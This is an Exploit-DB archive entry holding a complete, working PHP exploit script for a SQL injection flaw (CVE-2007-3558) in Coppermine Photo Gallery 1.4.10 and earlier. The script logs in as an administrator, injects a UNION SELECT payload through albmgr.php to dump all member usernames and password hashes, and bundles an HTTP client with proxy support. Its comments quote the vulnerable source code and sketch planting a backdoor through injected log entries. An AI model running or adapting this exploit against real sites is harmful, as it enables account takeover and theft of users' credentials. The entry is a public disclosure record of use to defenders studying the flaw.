Coppermine Photo Gallery <= 1.4.10 - Remote SQL Injection Exploit

2007-01-05T00:00:00
ID EDB-ID:3085
Type exploitdb
Reporter DarkFig
Modified 2007-01-05T00:00:00

Description

Coppermine Photo Gallery <= 1.4.10 Remote SQL Injection Exploit. CVE-2007-3558. Webapps exploit for php platform

                                        
                                            #!/usr/bin/php
&lt;?php
if($argc &lt; 4)
{
       print "\n---------------------------------------------------------";
       print "\nAffected.scr..: Coppermine Photo Gallery &lt;= 1.4.10";
       print "\nPoc.ID........: 19070104";
       print "\nType..........: SQL Injection";
       print "\nRisk.level....: Medium";
       print "\nSrc.download..: coppermine-gallery.net";
       print "\nPoc.link......: acid-root.new.fr/poc/19070104.txt";
       print "\nCredits.......: DarkFig";
       print "\n---------------------------------------------------------";
       print "\nUsage.........: php xpl.php &lt;url&gt; &lt;adminuser&gt; &lt;adminpass&gt;";
       print "\nProxyOptions..: &lt;proxhost:proxport&gt; &lt;proxuser:proxpass&gt;";
       print "\nExample.......: php xpl.php http://c.com/ admin passwd";
       print "\n---------------------------------------------------------\n";
       exit(1);
}


/*/
 [0] =&gt; xpl.php         [1] =&gt; http://localhost/cpg1410/
 [2] =&gt; root            [3] =&gt; toor
 [4] =&gt; localhost:8200  [5] =&gt; user:passwd
/*/
$url=$argv[1];$adu=$argv[2];
$adp=$argv[3];$pxs=$argv[4];
$pxa=$argv[5];

$xpl = new phpsploit();
$xpl-&gt;agent("InternetExploiter");
$xpl-&gt;cookiejar(1);
$xpl-&gt;allowredirection(1);

print "\nheader&gt; ===============================================";
print "\nheader&gt; Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader&gt; ===============================================";

if(!empty($pxs)){
       print "\nstatus&gt; Using a proxy $pxs";
       $xpl-&gt;proxy($pxs);
}

if(!empty($pxa)){
       print "\nstatus&gt; Basic proxy authentification $pxa";
       $xpl-&gt;proxyauth($pxa);
}


/*/
 Table prefix.
/*/
print "\nstatus&gt; Searching the version";
$xpl-&gt;get($url.'include/index.html');
if(preg_match("#Coppermine version: ([0-9]*\.[0-9]*\.[0-9]*)#",$xpl-&gt;getcontent(),$matches)) print "\nsploit&gt; Coppermine version ".$matches[1];
else print "\nsploit&gt; Not found";
$table = !empty($matches[1]) ? 'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users';


/*/
 If you have the admin cookie (but not the password),
 replace lines 73=&gt;76 by $xpl-&gt;addcookie('yourcookie');
/*/
print "\nstatus&gt; Trying to get logged in";
$xpl-&gt;post($url."login.php?referer=index.php","username=$adu&password=$adp&remember_me=1&submitted=Se+Connecter");
if(!preg_match("#color:red#",$xpl-&gt;getcontent())) print "\nsploit&gt; Done";
else die("\nstatus&gt; Exploit failed\n");


/*/
 (usermgr.php)
 =============
 case 'group_alb_access' :
 if (isset($_GET['gid']))  $group_id = $_GET['gid'];
 $sql = "SELECT group_name  FROM [...] WHERE group_id = $group_id [...]";
 $result = cpg_db_query($sql);

 (db_ecard.php)
 ==============
 $start = isset($_REQUEST['start']) ? $_REQUEST['start'] : '';  [...]
 if (!$start) {$startFrom = '0';}else{$startFrom=$start;}  [...]
 $result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection LIMIT $startFrom,$countTo");

 (albmgr.php)
 ============
 $cat = isset($_GET['cat']) ? ($_GET['cat']) : 0;
 if ($cat == 1) $cat = 0;
 if (GALLERY_ADMIN_MODE) {
 $result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY pos ASC");

 (filename_to_title())
 =====================
 $albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
 $albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...]
 $result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");

 (del_titles())
 ==============
 $albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
 $albstr = ($albumid) ? " WHERE aid = $albumid" : '';
 $result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");
/*/
print "\nstatus&gt; Retrieving all members password";
$xpl-&gt;get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_password/**/from/**/$table/*");
if(preg_match_all("#&lt;option value=\"album_no=(.*),album_nm='([a-z0-9]{32})'#",$xpl-&gt;getcontent(),$matches)) print "\nsploit&gt; Done";
else die("\nstatus&gt; Exploit failed\n");

print "\nsploit&gt; +----------------------------------+----------+";
print "\nsploit&gt; |             PASSWORD             |   USER   |";
print "\nsploit&gt; +----------------------------------+----------+";


/*/
 (init.inc.php)
 ==============
 $HTML_SUBST = array('&' =&gt; '&amp;', '"' =&gt; '&quot;', '&lt;' =&gt; '&lt;', '&gt;' =&gt; '&gt;', '%26' =&gt; '&amp;', '%22' =&gt; '&quot;', '%3C' =&gt; '&lt;', '%3E' =&gt; '&gt;','%27' =&gt; '&#39;', "'" =&gt; '&#39;');
 [...]
 if (is_array($_POST)) { // and GET, SERVER, REQUEST...
 foreach ($_POST as $key =&gt; $value) {
 if (!is_array($value))
 $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
 if (!in_array($key, $keysToSkip) && isset($$key)) unset($$key);
 }

 ... that's why we use the html_entity_decode() function.
 I just wanted &lt; for a remote php code execution sploit without admin rights :'(.
 When the admin view the security logs, it include "security.log.php"...

 (security.log.php)
 ==================
 [...]
 if (!defined('IN_COPPERMINE')) die(); ?&gt;

 Denied privileged access to viewlog.php from user Guest at  on January 4, 2007, 2:10 pm
 Failed login attempt with Username: &lt;?php mail(you); [...] fwrite(backdoor.php); [...] /* from IP 127.0.0.1 on Jan 04, 2007 at 01:16 PM
/*/
for($i=0;$i&lt;count($matches[0]);$i++)
{
       print "\nsploit&gt; | ".$matches[2][$i].' | '.html_entity_decode($matches[1][$i]);
       if($i==(count($matches[0])-1)){
       print "\nsploit&gt; +----------------------------------+----------+\n";
       }
}

class phpsploit {

	/**
	 * This function is called by the get()/post() functions.
	 * You don't have to call it, this is the main function.
	 *
	 * @return $server_response
	 */
	private function sock()
	{
		if(!empty($this-&gt;proxyhost) && !empty($this-&gt;proxyport)) $socket = fsockopen($this-&gt;proxyhost,$this-&gt;proxyport);
		else $socket = fsockopen($this-&gt;host,$this-&gt;port);
		
		if(!$socket) die("Error: The host doesn't exist");
		
		if($this-&gt;method==="get") $this-&gt;packet = "GET ".$this-&gt;url." HTTP/1.1\r\n";
		elseif($this-&gt;method==="post") $this-&gt;packet = "POST ".$this-&gt;url. " HTTP/1.1\r\n";
		else die("Error: Invalid method");
		
		if(!empty($this-&gt;proxyuser)) $this-&gt;packet .= "Proxy-Authorization: Basic ".base64_encode($this-&gt;proxyuser.":".$this-&gt;proxypass)."\r\n";
		$this-&gt;packet .= "Host: ".$this-&gt;host."\r\n";
		
		if(!empty($this-&gt;agent))  $this-&gt;packet .= "User-Agent: ".$this-&gt;agent."\r\n";
		if(!empty($this-&gt;header)) $this-&gt;packet .= $this-&gt;header."\r\n";
		if(!empty($this-&gt;cookie)) $this-&gt;packet .= "Cookie: ".$this-&gt;cookie."\r\n";
		
		$this-&gt;packet .= "Connection: Close\r\n";
		if($this-&gt;method==="post")
		{
			$this-&gt;packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this-&gt;packet .= "Content-Length: ".strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data."\r\n";
		}
		$this-&gt;packet .= "\r\n";
		$this-&gt;recv = '';
		
		fputs($socket,$this-&gt;packet);
		while(!feof($socket)) $this-&gt;recv .= fgets($socket);
		fclose($socket);
		
		if($this-&gt;cookiejar) $this-&gt;cookiejar($this-&gt;getheader($this-&gt;recv));
		if($this-&gt;allowredirection) return $this-&gt;allowredirection($this-&gt;recv);
		else return $this-&gt;recv;
	}
	

	/**
	 * This function allows you to add several cookie in the
	 * request. Several methods are supported:
	 * 
	 * $this-&gt;addcookie("name","value");
	 * or
	 * $this-&gt;addcookie("name=newvalue");
	 * or
	 * $this-&gt;addcookie("othername=overvalue; xx=zz; y=u");
	 * 
	 * @param string $cookiename
	 * @param string $cookievalue
	 * 
	 */
	public function addcookie($cookn,$cookv='')
	{
		// $this-&gt;addcookie("name","value"); work avec replace
		if(!empty($cookv))
		{
			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
			if(!empty($this-&gt;cookie))
			{
			    if(preg_match("/$cookn=/",$this-&gt;cookie))
			    {
			    	$this-&gt;cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this-&gt;cookie);
			    }
			    else
			    {
			    	$this-&gt;cookie .= " ".$cookn."=".$cookv.";"; // " ".
			    }
			}
			else
			{
				$this-&gt;cookie = $cookn."=".$cookv.";";
			}
		}
		// $this-&gt;addcookie("name=value; othername=othervalue");
		else
		{
	    	 if(!empty($this-&gt;cookie))
	    	 {
	    	 	$cookn = preg_replace("/(.*);$/","$1",$cookn);
	    	 	$cookarr = explode(";",str_replace(" ", "",$cookn));
	    	 	for($i=0;$i&lt;count($cookarr);$i++)
	    	 	{
	    	 		preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches);
	    	 		$cookn = $matches[1];
	    	 		$cookv = $matches[2];
	    	 		$this-&gt;addcookie($cookn,$cookv);
	    	 	}
	    	 }
			 else
			 {
			 	$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
			 	$this-&gt;cookie = $cookn;			
			 }
		}
	}
	
	
	/**
	 * This function allows you to add several headers in the
	 * request. Several methods are supported:
	 *
	 * $this-&gt;addheader("headername","headervalue");
	 * or
	 * $this-&gt;addheader("headername: headervalue");
	 *
	 * @param string $headername
	 * @param string $headervalue
	 */
	public function addheader($headern,$headervalue='')
	{
		// $this-&gt;addheader("name","value");
		if(!empty($headervalue))
		{
			if(!empty($this-&gt;header))
			{
				if(preg_match("/$headern:/",$this-&gt;header))
				{
					$this-&gt;header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this-&gt;header);
				}
				else
				{
					$this-&gt;header .= "\r\n".$headern.": ".$headervalue;
				}
			}
			else
			{
				$this-&gt;header=$headern.": ".$headervalue;
			}
		}
		// $this-&gt;addheader("name: value");
		else 
		{
			if(!empty($this-&gt;header))
			{
				$headarr = explode(": ",$headern);
				$headern = $headarr[0];
				$headerv = $headarr[1];
				$this-&gt;addheader($headern,$headerv);
			}
			else
			{
				$this-&gt;header=$headern;
			}
		}
	}
	

	/**
	 * This function allows you to use an http proxy server.
	 * Several methods are supported:
	 * 
	 * $this-&gt;proxy("proxyip","8118");
	 * or
	 * $this-&gt;proxy("proxyip:8118")
	 *
	 * @param string $proxyhost
	 * @param integer $proxyport
	 */
	public function proxy($proxy,$proxyp='')
	{
		// $this-&gt;proxy("localhost:8118");
		if(empty($proxyp))
		{
			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
			$proxh = $proxarr[1];
			$proxp = $proxarr[2];
			$this-&gt;proxyhost=$proxh;
			$this-&gt;proxyport=$proxp;
		}
		// $this-&gt;proxy("localhost",8118);
		else 
		{
			$this-&gt;proxyhost=$proxy;
			$this-&gt;proxyport=intval($proxyp);
		}
		if($this-&gt;proxyport &gt; 65535) die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an http proxy server
	 * which requires a basic authentification. Several
	 * methods are supported:
	 * 
	 * $this-&gt;proxyauth("darkfig","dapasswd");
	 * or
	 * $this-&gt;proxyauth("darkfig:dapasswd");
	 *
	 * @param string $proxyuser
	 * @param string $proxypass
	 */
	public function proxyauth($proxyauth,$proxypasse='')
	{
		// $this-&gt;proxyauth("darkfig:password");
		if(empty($proxypasse))
		{
			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
			$proxu = $proxautharr[1];
			$proxp = $proxautharr[2];
			$this-&gt;proxyuser=$proxu;
			$this-&gt;proxypass=$proxp;
		}
		// $this-&gt;proxyauth("darkfig","password");
		else
		{
			$this-&gt;proxyuser=$proxyauth;
			$this-&gt;proxypass=$proxypasse;
		}
	}

	
	/**
	 * This function allows you to set the "User-Agent" header.
	 * Several methods are possible to do that:
	 * 
	 * $this-&gt;agent("Mozilla Firefox");
	 * or
	 * $this-&gt;addheader("User-Agent: Mozilla Firefox");
	 * or
	 * $this-&gt;addheader("User-Agent","Mozilla Firefox");
	 * 
	 * @param string $useragent
	 */
	public function agent($useragent)
	{
		$this-&gt;agent=$useragent;
	}

	
	/**
	 * This function returns the header which will be
	 * in the next request.
	 * 
	 * $this-&gt;showheader();
	 *
	 * @return $header
	 */
	public function showheader()
	{
		return $this-&gt;header;
	}

	
	/**
	 * This function returns the cookie which will be
	 * in the next request.
	 * 
	 * $this-&gt;showcookie();
	 *
	 * @return $storedcookies
	 */
	public function showcookie()
	{
		return $this-&gt;cookie;
	}

	
	/**
	 * This function returns the last formed
	 * http request (the http packet).
	 * 
	 * $this-&gt;showlastrequest();
	 * 
	 * @return $last_http_request
	 */
	public function showlastrequest()
	{
		return $this-&gt;packet;
	}
	
	
	/**
	 * This function sends the formed http packet with the
	 * GET method. You can precise the port of the host.
	 * 
	 * $this-&gt;get("http://localhost");
	 * $this-&gt;get("http://localhost:888/xd/tst.php");
	 * 
	 * @param string $urlwithpath
	 * @return $server_response
	 */
	public function get($url)
	{
		$this-&gt;target($url);
		$this-&gt;method="get";
		return $this-&gt;sock();
	}

	
	/**
	 * This function sends the formed http packet with the
	 * POST method. You can precise the port of the host.
	 * 
	 * $this-&gt;post("http://localhost/index.php","admin=1&user=dark");
	 *
	 * @param string $urlwithpath
	 * @param string $postdata
	 * @return $server_response
	 */	
	public function post($url,$data)
	{
		$this-&gt;target($url);
		$this-&gt;method="post";
		$this-&gt;data=$data;
		return $this-&gt;sock();
	}

	
	/**
	 * This function returns the content of the server response
	 * without the headers.
	 * 
	 * $this-&gt;getcontent($this-&gt;get("http://localhost/"));
	 * or
	 * $this-&gt;getcontent();
	 *
	 * @param string $server_response
	 * @return $onlythecontent
	 */
	public function getcontent($code='')
	{
		if(empty($code)) $code = $this-&gt;recv;
		$content = explode("\n",$code);
		$onlycode = '';
		for($i=1;$i&lt;count($content);$i++)
		{
			if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1;
			if($ok) $onlycode .= $content[$i]."\n";
		}
		return $onlycode;
	}

	
	/**
	 * This function returns the headers of the server response
	 * without the content.
	 * 
	 * $this-&gt;getheader($this-&gt;post("http://localhost/x.php","x=1&z=2"));
	 * or
	 * $this-&gt;getheader();
	 *
	 * @param string $server_response
	 * @return $onlytheheaders
	 */
	public function getheader($code='')
	{
		if(empty($code)) $code = $this-&gt;recv;
		$header = explode("\n",$code);
		$onlyheader = $header[0]."\n";
		for($i=1;$i&lt;count($header);$i++)
		{
			if(!preg_match("/^(\S*):/",$header[$i])) break;
			$onlyheader .= $header[$i]."\n";
		}
		return $onlyheader;
	}

	
	/**
	 * This function is called by the cookiejar() function.
	 * It adds the value of the "Set-Cookie" header in the "Cookie"
	 * header for the next request. You don't have to call it.
	 * 
	 * @param string $server_response
	 */
	private function getcookie($code)
	{
		$carr = explode("\n",str_replace("\r\n","\n",$code));
		for($z=0;$z&lt;count($carr);$z++)
		{
			if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr))
			{
				$cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1]));
			}
		}

		for($i=0;$i&lt;count($cookie);$i++)
		{
			preg_match("/(\S*)=(\S*);/",$cookie[$i],$matches);
	    	        $cookn = $matches[1];
	    	        $cookv = $matches[2];
	    	        $this-&gt;addcookie($cookn,$cookv);
		}
    }

	
	/**
	 * This function is called by the get()/post() functions.
	 * You don't have to call it.
	 *
	 * @param string $urltarg
	 */
	private function target($urltarg)
	{
		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
		$this-&gt;url=$urltarg;
		
		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
		$this-&gt;host=$array[0];

		preg_match("/:(\d+)\//",$urltarg,$matches);
		$this-&gt;port=empty($matches[1]) ? 80 : $matches[1];
		
		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
		preg_match("/\/(.*)\//",$temp,$matches);
		$this-&gt;path=str_replace("//","/","/".$matches[1]."/");
	
		if($this-&gt;port &gt; 65535) die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function, the script will
	 * extract all "Set-Cookie" headers values
	 * and it will automatically add them into the "Cookie" header
	 * for all next requests.
	 *
	 * $this-&gt;cookiejar(1); // enabled
	 * $this-&gt;cookiejar(0); // disabled
	 * 
	 */
	public function cookiejar($code)
	{
		if($code===0) $this-&gt;cookiejar='';
		if($code===1) $this-&gt;cookiejar=1;
		else
		{
			$this-&gt;getcookie($code);
		}
	}


	/**
	 * If you call this function, the script will
	 * follow all redirections sent by the server.
	 * 
	 * $this-&gt;allowredirection(1); // enabled
	 * $this-&gt;allowredirection(0); // disabled
	 * 
	 * @return $this-&gt;get($locationresponse)
	 */
	public function allowredirection($code)
	{
		if($code===0) $this-&gt;allowredirection='';
		if($code===1) $this-&gt;allowredirection=1;
		else
		{
			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
			{
				$location = str_replace(chr(13),'',$codearr[2]);
				if(!eregi("://",$location))
				{
					return $this-&gt;get("http://".$this-&gt;host.$this-&gt;path.$location);
				}
				else
				{
					return $this-&gt;get($location);
				}
			}
			else
			{
				return $code;
			}
		}
	}
	
	
	/**
	 * This function allows you to reset some parameters:
	 * 
	 * $this-&gt;reset(header); // headers cleaned
	 * $this-&gt;reset(cookie); // cookies cleaned
	 * $this-&gt;reset();       // clean all parameters
	 *
	 * @param string $func
	 */
	public function reset($func='')
	{
		switch($func)
		{
			case "header":
			$this-&gt;header='';
			break;
			
			case "cookie":
			$this-&gt;cookie='';
			break;
			
			default:
		        $this-&gt;cookiejar='';
		        $this-&gt;header='';
		        $this-&gt;cookie='';
		        $this-&gt;allowredirection=''; 
		        $this-&gt;agent='';
		        break;
		}
	}
}

?&gt;

# milw0rm.com [2007-01-05]